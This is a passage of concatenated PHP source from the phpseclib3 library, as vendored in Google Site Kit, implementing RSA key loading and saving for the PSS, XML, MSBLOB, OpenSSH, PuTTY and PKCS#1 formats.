KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * Analogous to "openssl genpkey -algorithm rsa-pss". * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted RSA-PSS Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PSS extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 { /** * OID Name * * @var string */ const OID_NAME = 'id-RSASSA-PSS'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.1.10'; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = \false; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = \false; /** * Initialize static variables */ private static function initialize_static_variables() { if (!self::$oidsLoaded) { \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs(['md2' => '1.2.840.113549.2.2', 'md4' => '1.2.840.113549.2.4', 'md5' => '1.2.840.113549.2.5', 'id-sha1' => '1.3.14.3.2.26', 'id-sha256' => '2.16.840.1.101.3.4.2.1', 'id-sha384' => '2.16.840.1.101.3.4.2.2', 'id-sha512' => '2.16.840.1.101.3.4.2.3', 'id-sha224' => '2.16.840.1.101.3.4.2.4', 'id-sha512/224' => '2.16.840.1.101.3.4.2.5', 'id-sha512/256' => '2.16.840.1.101.3.4.2.6', 'id-mgf1' => '1.2.840.113549.1.1.8']); self::$oidsLoaded = \true; } } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } $components = ['isPublicKey' => \strpos($key, 'PUBLIC') !== \false]; $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'private' : 'public'; $result = $components + \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::load($key[$type . 'Key']); if (isset($key[$type . 'KeyAlgorithm']['parameters'])) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type . 'KeyAlgorithm']['parameters']); if ($decoded === \false) { throw new \UnexpectedValueException('Unable to decode parameters'); } $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSASSA_PSS_params::MAP); } else { $params = []; } if (isset($params['maskGenAlgorithm']['parameters'])) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($params['maskGenAlgorithm']['parameters']); if ($decoded === \false) { throw new \UnexpectedValueException('Unable to decode parameters'); } $params['maskGenAlgorithm']['parameters'] = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\HashAlgorithm::MAP); } else { $params['maskGenAlgorithm'] = ['algorithm' => 'id-mgf1', 'parameters' => ['algorithm' => 'id-sha1']]; } if (!isset($params['hashAlgorithm']['algorithm'])) { $params['hashAlgorithm']['algorithm'] = 'id-sha1'; } $result['hash'] = \str_replace('id-', '', $params['hashAlgorithm']['algorithm']); $result['MGFHash'] = \str_replace('id-', '', $params['maskGenAlgorithm']['parameters']['algorithm']); if (isset($params['saltLength'])) { $result['saltLength'] = (int) $params['saltLength']->toString(); } if (isset($key['meta'])) { $result['meta'] = $key['meta']; } return $result; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { self::initialize_static_variables(); $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::savePrivateKey($n, $e, $d, $primes, $exponents, $coefficients); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); $params = self::savePSSParams($options); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, array $options = []) { self::initialize_static_variables(); $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS1::savePublicKey($n, $e); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); $params = self::savePSSParams($options); return self::wrapPublicKey($key, $params); } /** * Encodes PSS parameters * * @param array $options * @return string */ public static function savePSSParams(array $options) { /* The trailerField field is an integer. It provides compatibility with IEEE Std 1363a-2004 [P1363A]. The value MUST be 1, which represents the trailer field with hexadecimal value 0xBC. Other trailer fields, including the trailer field composed of HashID concatenated with 0xCC that is specified in IEEE Std 1363a, are not supported. Implementations that perform signature generation MUST omit the trailerField field, indicating that the default trailer field value was used. Implementations that perform signature validation MUST recognize both a present trailerField field with value 1 and an absent trailerField field. source: https://tools.ietf.org/html/rfc4055#page-9 */ $params = ['trailerField' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)]; if (isset($options['hash'])) { $params['hashAlgorithm']['algorithm'] = 'id-' . $options['hash']; } if (isset($options['MGFHash'])) { $temp = ['algorithm' => 'id-' . $options['MGFHash']]; $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($temp, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\HashAlgorithm::MAP); $params['maskGenAlgorithm'] = ['algorithm' => 'id-mgf1', 'parameters' => new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($temp)]; } if (isset($options['saltLength'])) { $params['saltLength'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($options['saltLength']); } return new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSASSA_PSS_params::MAP)); } } <?php /** * XML Formatted RSA Key Handler * * More info: * * http://www.w3.org/TR/xmldsig-core/#sec-RSAKeyValue * http://www.w3.org/TR/xkms2/#XKMS_2_0_Paragraph_269 * http://en.wikipedia.org/wiki/XML_Signature * http://en.wikipedia.org/wiki/XKMS * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * XML Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class XML { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (!\class_exists('DOMDocument')) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('The dom extension is not setup correctly on this system'); } $components = ['isPublicKey' => \false, 'primes' => [], 'exponents' => [], 'coefficients' => []]; $use_errors = \libxml_use_internal_errors(\true); $dom = new \DOMDocument(); if (\substr($key, 0, 5) != '<?xml') { $key = '<xml>' . $key . '</xml>'; } if (!$dom->loadXML($key)) { \libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); $keys = ['modulus', 'exponent', 'p', 'q', 'dp', 'dq', 'inverseq', 'd']; foreach ($keys as $key) { // $dom->getElementsByTagName($key) is case-sensitive $temp = $xpath->query("//*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='{$key}']"); if (!$temp->length) { continue; } $value = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($temp->item(0)->nodeValue), 256); switch ($key) { case 'modulus': $components['modulus'] = $value; break; case 'exponent': $components['publicExponent'] = $value; break; case 'p': $components['primes'][1] = $value; break; case 'q': $components['primes'][2] = $value; break; case 'dp': $components['exponents'][1] = $value; break; case 'dq': $components['exponents'][2] = $value; break; case 'inverseq': $components['coefficients'][2] = $value; break; case 'd': $components['privateExponent'] = $value; } } \libxml_use_internal_errors($use_errors); foreach ($components as $key => $value) { if (\is_array($value) && !\count($value)) { unset($components[$key]); } } if (isset($components['modulus']) && isset($components['publicExponent'])) { if (\count($components) == 3) { $components['isPublicKey'] = \true; } return $components; } throw new \UnexpectedValueException('Modulus / exponent not present'); } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '') { if (\count($primes) != 2) { throw new \InvalidArgumentException('XML does not support multi-prime RSA keys'); } if (!empty($password) && \is_string($password)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('XML private keys do not support encryption'); } return "<RSAKeyPair>\r\n" . ' <Modulus>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($n->toBytes()) . "</Modulus>\r\n" . ' <Exponent>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($e->toBytes()) . "</Exponent>\r\n" . ' <P>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($primes[1]->toBytes()) . "</P>\r\n" . ' <Q>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($primes[2]->toBytes()) . "</Q>\r\n" . ' <DP>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($exponents[1]->toBytes()) . "</DP>\r\n" . ' <DQ>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($exponents[2]->toBytes()) . "</DQ>\r\n" . ' <InverseQ>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($coefficients[2]->toBytes()) . "</InverseQ>\r\n" . ' <D>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($d->toBytes()) . "</D>\r\n" . '</RSAKeyPair>'; } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e) { return "<RSAKeyValue>\r\n" . ' <Modulus>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($n->toBytes()) . "</Modulus>\r\n" . ' <Exponent>' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($e->toBytes()) . "</Exponent>\r\n" . '</RSAKeyValue>'; } } <?php /** * Miccrosoft BLOB Formatted RSA Key Handler * * More info: * * https://msdn.microsoft.com/en-us/library/windows/desktop/aa375601(v=vs.85).aspx * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Microsoft BLOB Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class MSBLOB { /** * Public/Private Key Pair * */ const PRIVATEKEYBLOB = 0x7; /** * Public Key * */ const PUBLICKEYBLOB = 0x6; /** * Public Key * */ const PUBLICKEYBLOBEX = 0xa; /** * RSA public key exchange algorithm * */ const CALG_RSA_KEYX = 0xa400; /** * RSA public key exchange algorithm * */ const CALG_RSA_SIGN = 0x2400; /** * Public Key * */ const RSA1 = 0x31415352; /** * Private Key * */ const RSA2 = 0x32415352; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($key); if (!\is_string($key)) { throw new \UnexpectedValueException('Base64 decoding produced an error'); } if (\strlen($key) < 20) { throw new \UnexpectedValueException('Key appears to be malformed'); } // PUBLICKEYSTRUC publickeystruc // https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453(v=vs.85).aspx \extract(\unpack('atype/aversion/vreserved/Valgo', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, 8))); /** * @var string $type * @var string $version * @var integer $reserved * @var integer $algo */ switch (\ord($type)) { case self::PUBLICKEYBLOB: case self::PUBLICKEYBLOBEX: $publickey = \true; break; case self::PRIVATEKEYBLOB: $publickey = \false; break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } $components = ['isPublicKey' => $publickey]; // https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549(v=vs.85).aspx switch ($algo) { case self::CALG_RSA_KEYX: case self::CALG_RSA_SIGN: break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } // RSAPUBKEY rsapubkey // https://msdn.microsoft.com/en-us/library/windows/desktop/aa387685(v=vs.85).aspx // could do V for pubexp but that's unsigned 32-bit whereas some PHP installs only do signed 32-bit \extract(\unpack('Vmagic/Vbitlen/a4pubexp', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, 12))); /** * @var integer $magic * @var integer $bitlen * @var string $pubexp */ switch ($magic) { case self::RSA2: $components['isPublicKey'] = \false; // fall-through case self::RSA1: break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } $baseLength = $bitlen / 16; if (\strlen($key) != 2 * $baseLength && \strlen($key) != 9 * $baseLength) { throw new \UnexpectedValueException('Key appears to be malformed'); } $components[$components['isPublicKey'] ? 'publicExponent' : 'privateExponent'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev($pubexp), 256); // BYTE modulus[rsapubkey.bitlen/8] $components['modulus'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 8)), 256); if ($publickey) { return $components; } $components['isPublicKey'] = \false; // BYTE prime1[rsapubkey.bitlen/16] $components['primes'] = [1 => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 16)), 256)]; // BYTE prime2[rsapubkey.bitlen/16] $components['primes'][] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 16)), 256); // BYTE exponent1[rsapubkey.bitlen/16] $components['exponents'] = [1 => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 16)), 256)]; // BYTE exponent2[rsapubkey.bitlen/16] $components['exponents'][] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 16)), 256); // BYTE coefficient[rsapubkey.bitlen/16] $components['coefficients'] = [2 => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 16)), 256)]; if (isset($components['privateExponent'])) { $components['publicExponent'] = $components['privateExponent']; } // BYTE privateExponent[rsapubkey.bitlen/8] $components['privateExponent'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, $bitlen / 8)), 256); return $components; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '') { if (\count($primes) != 2) { throw new \InvalidArgumentException('MSBLOB does not support multi-prime RSA keys'); } if (!empty($password) && \is_string($password)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException('MSBLOB private keys do not support encryption'); } $n = \strrev($n->toBytes()); $e = \str_pad(\strrev($e->toBytes()), 4, "\x00"); $key = \pack('aavV', \chr(self::PRIVATEKEYBLOB), \chr(2), 0, self::CALG_RSA_KEYX); $key .= \pack('VVa*', self::RSA2, 8 * \strlen($n), $e); $key .= $n; $key .= \strrev($primes[1]->toBytes()); $key .= \strrev($primes[2]->toBytes()); $key .= \strrev($exponents[1]->toBytes()); $key .= \strrev($exponents[2]->toBytes()); $key .= \strrev($coefficients[2]->toBytes()); $key .= \strrev($d->toBytes()); return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e) { $n = \strrev($n->toBytes()); $e = \str_pad(\strrev($e->toBytes()), 4, "\x00"); $key = \pack('aavV', \chr(self::PUBLICKEYBLOB), \chr(2), 0, self::CALG_RSA_KEYX); $key .= \pack('VVa*', self::RSA1, 8 * \strlen($n), $e); $key .= $n; return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key); } } <?php /** * OpenSSH Formatted RSA Key Handler * * PHP version 5 * * Place in $HOME/.ssh/authorized_keys * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * OpenSSH Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSH extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH { /** * Supported Key Types * * @var array */ protected static $types = ['ssh-rsa']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { static $one; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $parsed['paddedKey']); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ({$type} vs {$parsed['type']})"); } $primes = $coefficients = []; list($modulus, $publicExponent, $privateExponent, $coefficients[2], $primes[1], $primes[2], $comment, ) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('i6s', $parsed['paddedKey']); $temp = $primes[1]->subtract($one); $exponents = [1 => $publicExponent->modInverse($temp)]; $temp = $primes[2]->subtract($one); $exponents[] = $publicExponent->modInverse($temp); $isPublicKey = \false; return \compact('publicExponent', 'modulus', 'privateExponent', 'primes', 'coefficients', 'exponents', 'comment', 'isPublicKey'); } list($publicExponent, $modulus) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ii', $parsed['publicKey']); return ['isPublicKey' => \true, 'modulus' => $modulus, 'publicExponent' => $publicExponent, 'comment' => $parsed['comment']]; } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, array $options = []) { $RSAPublicKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sii', 'ssh-rsa', $e, $n); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $RSAPublicKey; } $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $RSAPublicKey = 'ssh-rsa ' . \base64_encode($RSAPublicKey) . ' ' . $comment; return $RSAPublicKey; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $publicKey = self::savePublicKey($n, $e, ['binary' => \true]); $privateKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('si6', 'ssh-rsa', $n, $e, $d, $coefficients[2], $primes[1], $primes[2]); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } <?php /** * PuTTY Formatted RSA Key Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PuTTY Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PuTTY extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY { /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\OpenSSH'; /** * Algorithm Identifier * * @var array */ protected static $types = ['ssh-rsa']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { static $one; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } \extract($components); unset($components['public'], $components['private']); $isPublicKey = \false; $result = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ii', $public); if ($result === \false) { throw new \UnexpectedValueException('Key appears to be malformed'); } list($publicExponent, $modulus) = $result; $result = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('iiii', $private); if ($result === \false) { throw new \UnexpectedValueException('Key appears to be malformed'); } $primes = $coefficients = []; list($privateExponent, $primes[1], $primes[2], $coefficients[2]) = $result; $temp = $primes[1]->subtract($one); $exponents = [1 => $publicExponent->modInverse($temp)]; $temp = $primes[2]->subtract($one); $exponents[] = $publicExponent->modInverse($temp); return \compact('publicExponent', 'modulus', 'privateExponent', 'primes', 'coefficients', 'exponents', 'comment', 'isPublicKey'); } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (\count($primes) != 2) { throw new \InvalidArgumentException('PuTTY does not support multi-prime RSA keys'); } $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ii', $e, $n); $private = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('iiii', $d, $primes[1], $primes[2], $coefficients[2]); return self::wrapPrivateKey($public, $private, 'ssh-rsa', $password, $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e) { return self::wrapPublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ii', $e, $n), 'ssh-rsa'); } } <?php /** * PKCS#1 Formatted RSA Key Handler * * PHP version 5 * * Used by File/X509.php * * Processes keys with the following headers: * * -----BEGIN RSA PRIVATE KEY----- * -----BEGIN RSA PUBLIC KEY----- * * Analogous to ssh-keygen's pem format (as specified by -m) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#1 Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (\strpos($key, 'PUBLIC') !== \false) { $components = ['isPublicKey' => \true]; } elseif (\strpos($key, 'PRIVATE') !== \false) { $components = ['isPublicKey' => \false]; } else { $components = []; } $key = parent::load($key, $password); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSAPrivateKey::MAP); if (\is_array($key)) { $components += ['modulus' => $key['modulus'], 'publicExponent' => $key['publicExponent'], 'privateExponent' => $key['privateExponent'], 'primes' => [1 => $key['prime1'], $key['prime2']], 'exponents' => [1 => $key['exponent1'], $key['exponent2']], 'coefficients' => [2 => $key['coefficient']]]; if ($key['version'] == 'multi') { foreach ($key['otherPrimeInfos'] as $primeInfo) { $components['primes'][] = $primeInfo['prime']; $components['exponents'][] = $primeInfo['exponent']; $components['coefficients'][] = $primeInfo['coefficient']; } } if (!isset($components['isPublicKey'])) { $components['isPublicKey'] = \false; } return $components; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSAPublicKey::MAP); if (!\is_array($key)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (!isset($components['isPublicKey'])) { $components['isPublicKey'] = \true; } return $components + $key; } /** * Convert a private key to the appropriate format. * * @param BigInteger $n * @param BigInteger $e * @param BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function 